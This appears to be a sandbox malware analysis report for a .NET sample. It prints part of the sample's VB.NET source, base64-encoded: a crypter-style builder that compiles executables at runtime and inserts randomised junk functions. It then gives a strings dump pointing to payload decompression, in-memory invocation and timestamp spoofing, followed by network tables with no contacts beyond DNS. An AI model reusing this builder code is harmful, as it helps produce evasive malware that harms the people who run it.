c3VsdHMNCg0KICAgICAgICBQYXJhbWV0ZXJzLkdlbmVyYXRlRXhlY3V0YWJsZSA9IFRydWUNCiAgICAgICAgUGFyYW1ldGVycy5PdXRwdXRBc3NlbWJseSA9IE91dHB1dA0KDQoNCiAgICAgICAgUGFyYW1ldGVycy5SZWZlcmVuY2VkQXNzZW1ibGllcy5BZGQoIlN5c3RlbS5kbGwiKQ0KICAgICAgICBQYXJhbWV0ZXJzLlJlZmVyZW5jZWRBc3NlbWJsaWVzLkFkZCgiU3lzdGVtLkRhdGEuZGxsIikNCg0KICAgICAgICBJZiByZXMgPSBUcnVlIFRoZW4NCiAgICAgICAgICAgIFBhcmFtZXRlcnMuRW1iZWRkZWRSZXNvdXJjZXMuQWRkKCJ6Q29tLnJlc291cmNlcyIpDQogICAgICAgIEVuZCBJZg0KICAgICAgICBQYXJhbWV0ZXJzLkNvbXBpbGVyT3B0aW9ucyA9ICIvZmlsZWFsaWduOjB4MDAwMDAyMDAgL29wdGltaXplKyAvcGxhdGZvcm06WDg2IC9kZWJ1Zy0gL3RhcmdldDp3aW5leGUiDQoNCiAgICAgICAgY1Jlc3VsdHMgPSBDb21waWxlci5Db21waWxlQXNzZW1ibHlGcm9tU291cmNlKFBhcmFtZXRlcnMsIFNvdXJjZSkNCg0KCQkNCg0KICAgIEVuZCBTdWINCkVuZCBDbGFzcw0KDQpQdWJsaWMgQ2xhc3MgVU5sRFVjd2FhcA0KDQogICAgUHJpdmF0ZSBUaXAgQXMgSW50ZWdlcg0KICAgIFByaXZhdGUgS29saWtvIEFzIEludGVnZXINCg0KICAgIFN1YiBOZXcoQnlWYWwgVHlwZSBBcyBJbnRlZ2VyLCBCeVZhbCBLb2xpa294IEFzIEludGVnZXIpDQogICAgICAgIFRpcCA9IFR5cGUNCiAgICAgICAgS29saWtvID0gS29saWtveA0KICAgIEVuZCBTdWINCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBnTUxNVEtKdXBkKCkgQXMgU3RyaW5nDQogICAgICAgIERpbSBob2xkZXIgQXMgU3RyaW5nID0gU3RyaW5nLkVtcHR5DQogICAgICAgIEZvciBpIEFzIEludGVnZXIgPSAwIFRvIEtvbGlrbw0KICAgICAgICAgICAgSWYgVGlwID0gMSBUaGVuDQogICAgICAgICAgICAgICAgaG9sZGVyID0gaG9sZGVyICYgeFlxZndGZ1NBcyhpKSAmIHZiTmV3TGluZQ0KICAgICAgICAgICAgRWxzZQ0KICAgICAgICAgICAgICAgIGhvbGRlciA9IGhvbGRlciAmIHRSTFN4cnltZWkoaSkgJiB2Yk5ld0xpbmUNCiAgICAgICAgICAgIEVuZCBJZg0KICAgICAgICBOZXh0DQogICAgICAgIFJldHVybiBob2xkZXINCiAgICBFbmQgRnVuY3Rpb24NCg0KICAgIFB1YmxpYyBGdW5jdGlvbiB0UkxTeHJ5bWVpKEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICBQdWJsaWMgU3ViIHZhcjEiICYgbmFtZSAmICIoQnlWYWwgdmFyMiBBcyBTdHJpbmcsIEJ5VmFsIHZhcjMgQXMgU3RyaW5nLCBCeVZhbCB2YXI0IEFzIFN0cmluZykiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeGl0IFN1YiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBTdWIiKQ0KICAgICAgICBEaW0gc3JjIEFzIFN0cmluZyA9IEZ1bmsuVG9TdHJpbmcNCiAgICAgICAgRGltIHZhcnMoKSBBcyBTdHJpbmcgPSB7InZhcjEiLCAidmFyMiIsICJ2YXIzIiwgInZhcjQiLCAidmFyNSIsICJ2YXI2In0NCiAgICAgICAgUmFuZG9taXplKCkNCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gdmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZSh2YXJzKGkpLCBBKDUpICYgbmFtZSkNCiAgICAgICAgTmV4dA0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBSZXR1cm4gc3JjDQogICAgRW5kIEZ1bmN0aW9uDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiB4WXFmd0ZnU0FzKEJ5VmFsIG5hbWUgQXMgU3RyaW5nKSBBcyBTdHJpbmcNCiAgICAgICAgRGltIEZ1bmsgQXMgTmV3IFN5c3RlbS5UZXh0LlN0cmluZ0J1aWxkZXINCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICBQdWJsaWMgRnVuY3Rpb24gdmFyMSIgJiBuYW1lICYgIihCeVZhbCB2YXIyIEFzIFN0cmluZywgQnlWYWwgdmFyMyBBcyBTdHJpbmcsIEJ5VmFsIHZhcjQgQXMgU3RyaW5nKSBBcyBTdHJpbmciKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICBEaW0gdmFyNSBBcyBTdHJpbmcoKSA9IHsiInZhcjEiIiwgIiJ2YXIyIiIsICIidmFyMyIiLCAiInZhcjQiIiwgIiJ2YXI1IiJ9IikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgRm9yIEVhY2ggdmFyNiBBcyBTdHJpbmcgSW4gdmFyNSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBEbyBVbnRpbCB2YXI1KDApID0gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgdmFyMyA9IHZhcjQgJiB2YXIyIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBJZiB2YXI0LkNvbnRhaW5zKHZhcjUoMikpID0gVHJ1ZSBUaGVuIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgdmFyNiA9IHZhcjQuTGVuZ3RoIC0gMSIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgIFdoaWxlIHZhcjMuTGVuZ3RoID0gMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBEbyBXaGlsZSB2YXIyLkNvbnRhaW5zKHZhcjUoMSkpIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICAgICAgRXhpdCBGdW5jdGlvbiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICAgICAgICAgICAgICBMb29wIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICAgICAgRW5kIFdoaWxlIikNCiAgICAgICAgRnVuay5BcHBlbmQodmJOZXdMaW5lICsgIiAgICAgICAgICAgICAgICBFbmQgSWYiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgICAgICAgICAgTG9vcCIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgICAgICBSZXR1cm4gdmFyMiIpDQogICAgICAgIEZ1bmsuQXBwZW5kKHZiTmV3TGluZSArICIgICAgICAgIE5leHQiKQ0KICAgICAgICBGdW5rLkFwcGVuZCh2Yk5ld0xpbmUgKyAiICAgIEVuZCBGdW5jdGlvbiIpDQogICAgICAgIERpbSBzcmMgQXMgU3RyaW5nID0gRnVuay5Ub1N0cmluZw0KICAgICAgICBEaW0gdmFycygpIEFzIFN0cmluZyA9IHsidmFyMSIsICJ2YXIyIiwgInZhcjMiLCAidmFyNCIsICJ2YXI1IiwgInZhcjYifQ0KICAgICAgICBSYW5kb21pemUoKQ0KICAgICAgICBGb3IgaSBBcyBJbnRlZ2VyID0gMCBUbyB2YXJzLkxlbmd0aCAtIDENCiAgICAgICAgICAgIHNyYyA9IHNyYy5SZXBsYWNlKHZhcnMoaSksIEEoNSkgJiBuYW1lKQ0KICAgICAgICBOZXh0DQogICAgICAgIFJhbmRvbWl6ZSgpDQogICAgICAgIFJldHVybiBzcmMNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQogICAgUHVibGljIEZ1bmN0aW9uIEEoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk1xd2VydHl1aW9wYXNkZmdoamtsenhjdmJubSIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCiAgICBQdWJsaWMgRnVuY3Rpb24gQUIoQnlWYWwgbGVuZ2h0IEFzIEludGVnZXIpIEFzIFN0cmluZw0KICAgICAgICBSYW5kb21pemUoKSA6IERpbSBiKCkgQXMgQ2hhciA6IERpbSBzIEFzIE5ldyBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKCIiKSA6IGIgPSAiMTIzNDU2Nzg5MCIuVG9DaGFyQXJyYXkoKSA6IEZvciBpIEFzIEludGVnZXIgPSAxIFRvIGxlbmdodCA6IFJhbmRvbWl6ZSgpIDogRGltIHogQXMgSW50ZWdlciA9IEludCgoKGIuTGVuZ3RoIC0gMikgLSAwICsgMSkgKiBSbmQoKSkgKyAxIDogcy5BcHBlbmQoYih6KSkgOiBOZXh0IDogUmV0dXJuIHMuVG9TdHJpbmcNCiAgICBFbmQgRnVuY3Rpb24NCg0KDQpFbmQgQ2xhc3MNCg0KDQo=
v2.0.50727
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
EFJuWEDCJxPrvHA
ptLftXpzewGQenA
NUBAGgeMZdpYeQU
myghflrVtIXZagj
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
mocCC00
vYLzG0
lKoPp0
xgIhD0
jsHKb11
TByXm1
cczna1
jbHhg1
Deflate_D
System.IO
Stream
getStreamBytesX
dataStr
dataChunks
SWkUJ00
nnssF0
VoAtP0
imSmv0
RNqpI11
fKiGX1
fcaJD1
DSJWz1
aQTInBfuHbQXbWH
dVLIw00
KOVuH0
HEgJd0
nFxDb0
zhEYZ11
gjmAY1
ibJaT1
bfZee1
lenght
ToBase
FromBase
zFLwJvTYROufxBs
Output
Source
Koliko
Kolikox
oIVGmipTismPtly
KlGFjVhwyTyjaEm
ClJOTJivKYGdiAD
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
String
Concat
Contains
get_Length
Conversions
Operators
CompareString
System.Resources
ResourceManager
Delete
ProjectData
Exception
SetProjectError
ClearProjectError
System.Reflection
Assembly
GetExecutingAssembly
GetObject
MethodInfo
get_EntryPoint
MethodBase
Invoke
MemoryStream
System.IO.Compression
DeflateStream
CompressionMode
CopyArray
STAThreadAttribute
DateTime
Random
ProcessStartInfo
ResourceWriter
Process
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
AddResource
Generate
IDisposable
Dispose
GetTempFileName
Replace
VBMath
Randomize
Strings
StrReverse
SetCreationTime
SetLastAccessTime
SetLastWriteTime
ProcessWindowStyle
set_WindowStyle
set_FileName
set_Arguments
System.Text
StringBuilder
ToCharArray
Conversion
Append
Encoding
get_Default
GetBytes
Convert
ToBase64String
FromBase64String
GetString
ICodeCompiler
CompilerResults
CompilerParameters
VBCodeProvider
CreateCompiler
set_GenerateExecutable
set_OutputAssembly
System.Collections.Specialized
StringCollection
get_ReferencedAssemblies
get_EmbeddedResources
set_CompilerOptions
CompileAssemblyFromSource
CreateProjectError
zCom.resources
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
tmp621C.tmp
tmp621C.tmp.exe
MyTemplate
8.0.0.0
My.Computer
My.User
My.Application
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
m�o�c�C�C�0�
v�Y�L�z�G�0�
l�K�o�P�p�0�
x�g�I�h�D�0�
c�I�F�P�X�0�
j�s�H�K�b�1�
T�B�y�X�m�1�
c�c�z�n�a�1�
j�b�H�h�g�1�
Y�x�b�h�G�1�
S�W�k�U�J�0�
n�n�s�s�F�0�
V�o�A�t�P�0�
i�m�S�m�v�0�
j�P�U�r�F�0�
R�N�q�p�I�1�
f�K�i�G�X�1�
f�c�a�J�D�1�
D�S�J�W�z�1�
W�y�U�k�O�1�
z�C�o�m�.�r�e�s�o�u�r�c�e�s�
p�t�L�f�t�X�p�z�e�w�G�Q�e�n�A�
N�U�B�A�G�g�e�M�Z�d�p�Y�e�Q�U�
E�F�J�u�W�E�D�C�J�x�P�r�v�H�A�
m�y�g�h�f�l�r�V�t�I�X�Z�a�g�j�
o�I�V�G�m�i�p�T�i�s�m�P�t�l�y�
K�l�G�F�j�V�h�w�y�T�y�j�a�E�m�
C�l�J�O�T�J�i�v�K�Y�G�d�i�A�D�
z�F�L�w�J�v�T�Y�R�O�u�f�x�B�s�
a�Q�T�I�n�B�f�u�H�b�Q�X�b�W�H�
d�V�L�I�w�0�
K�O�V�u�H�0�
H�E�g�J�d�0�
n�F�x�D�b�0�
E�e�J�F�I�0�
z�h�E�Y�Z�1�
g�j�m�A�Y�1�
i�b�J�a�T�1�
b�f�Z�e�e�1�
w�u�K�A�K�1�
q�w�e�r�t�y�u�i�o�p�a�s�d�f�g�h�j�k�l�z�x�c�v�b�n�m�Q�W�E�R�T�Y�U�I�O�P�A�S�D�F�G�H�J�K�L�Z�X�C�V�B�N�M�
1�2�3�4�5�6�7�8�9�0�
S�y�s�t�e�m�.�d�l�l�
S�y�s�t�e�m�.�D�a�t�a�.�d�l�l�
/�f�i�l�e�a�l�i�g�n�:�0�x�0�0�0�0�0�2�0�0� �/�o�p�t�i�m�i�z�e�+� �/�p�l�a�t�f�o�r�m�:�X�8�6� �/�d�e�b�u�g�-� �/�t�a�r�g�e�t�:�w�i�n�e�x�e�
� � � �P�u�b�l�i�c� �S�u�b� �v�a�r�1�
(�B�y�V�a�l� �v�a�r�2� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�3� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�4� �A�s� �S�t�r�i�n�g�)�
� � � � � � � �D�i�m� �v�a�r�5� �A�s� �S�t�r�i�n�g�(�)� �=� �{�"�v�a�r�1�"�,� �"�v�a�r�2�"�,� �"�v�a�r�3�"�,� �"�v�a�r�4�"�,� �"�v�a�r�5�"�}�
� � � � � � � �F�o�r� �E�a�c�h� �v�a�r�6� �A�s� �S�t�r�i�n�g� �I�n� �v�a�r�5�
� � � � � � � � � � � �D�o� �U�n�t�i�l� �v�a�r�5�(�0�)� �=� �v�a�r�2�
� � � � � � � � � � � � � � � �v�a�r�3� �=� �v�a�r�4� �&� �v�a�r�2�
� � � � � � � � � � � � � � � �I�f� �v�a�r�4�.�C�o�n�t�a�i�n�s�(�v�a�r�5�(�2�)�)� �=� �T�r�u�e� �T�h�e�n�
� � � � � � � � � � � � � � � � � � � �v�a�r�6� �=� �v�a�r�4�.�L�e�n�g�t�h� �-� �1�
� � � � � � � � � � � � � � � � � � � �W�h�i�l�e� �v�a�r�3�.�L�e�n�g�t�h� �=� �2�
� � � � � � � � � � � � � � � � � � � � � � � �D�o� �W�h�i�l�e� �v�a�r�2�.�C�o�n�t�a�i�n�s�(�v�a�r�5�(�1�)�)�
� � � � � � � � � � � � � � � � � � � � � � � � � � � �E�x�i�t� �S�u�b�
� � � � � � � � � � � � � � � � � � � � � � � �L�o�o�p�
� � � � � � � � � � � � � � � � � � � �E�n�d� �W�h�i�l�e�
� � � � � � � � � � � � � � � �E�n�d� �I�f�
� � � � � � � � � � � �L�o�o�p�
� � � � � � � �N�e�x�t�
� � � �E�n�d� �S�u�b�
� � � �P�u�b�l�i�c� �F�u�n�c�t�i�o�n� �v�a�r�1�
(�B�y�V�a�l� �v�a�r�2� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�3� �A�s� �S�t�r�i�n�g�,� �B�y�V�a�l� �v�a�r�4� �A�s� �S�t�r�i�n�g�)� �A�s� �S�t�r�i�n�g�
� � � � � � � � � � � � � � � � � � � � � � � � � � � �R�e�t�u�r�n� �v�a�r�2�
� � � � � � � � � � � � � � � � � � � � � � � � � � � �E�x�i�t� �F�u�n�c�t�i�o�n�
� � � � � � � � � � � �R�e�t�u�r�n� �v�a�r�2�
� � � �E�n�d� �F�u�n�c�t�i�o�n�
Q�W�E�R�T�Y�U�I�O�P�A�S�D�F�G�H�J�K�L�Z�X�C�V�B�N�M�q�w�e�r�t�y�u�i�o�p�a�s�d�f�g�h�j�k�l�z�x�c�v�b�n�m�
V�S�_�V�E�R�S�I�O�N�_�I�N�F�O�
V�a�r�F�i�l�e�I�n�f�o�
T�r�a�n�s�l�a�t�i�o�n�
S�t�r�i�n�g�F�i�l�e�I�n�f�o�
0�0�0�0�0�4�b�0�
F�i�l�e�D�e�s�c�r�i�p�t�i�o�n�
F�i�l�e�V�e�r�s�i�o�n�
0�.�0�.�0�.�0�
I�n�t�e�r�n�a�l�N�a�m�e�
t�m�p�6�2�1�C�.�t�m�p�.�e�x�e�
L�e�g�a�l�C�o�p�y�r�i�g�h�t�
O�r�i�g�i�n�a�l�F�i�l�e�n�a�m�e�
t�m�p�6�2�1�C�.�t�m�p�.�e�x�e�
P�r�o�d�u�c�t�V�e�r�s�i�o�n�
0�.�0�.�0�.�0�
A�s�s�e�m�b�l�y� �V�e�r�s�i�o�n�
0�.�0�.�0�.�0�
Hosts
| IP |
|---|
| 114.114.114.114 |
| 8.8.8.8 |
DNS
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| dns.msftncsi.com | A 131.107.255.255 | |
| dns.msftncsi.com |
TCP
No TCP connections recorded.
UDP
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 53179 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 49642 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 137 | 192.168.56.255 | 137 |
| 192.168.56.101 | 61714 | 114.114.114.114 | 53 |
| 192.168.56.101 | 61714 | 8.8.8.8 | 53 |
| 192.168.56.101 | 56933 | 8.8.8.8 | 53 |
| 192.168.56.101 | 138 | 192.168.56.255 | 138 |
| 192.168.56.101 | 58485 | 114.114.114.114 | 53 |
| 192.168.56.101 | 58485 | 8.8.8.8 | 53 |
HTTP & HTTPS Requests
No HTTP requests performed.
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts
Sorry! No dropped files.
Sorry! No dropped buffers.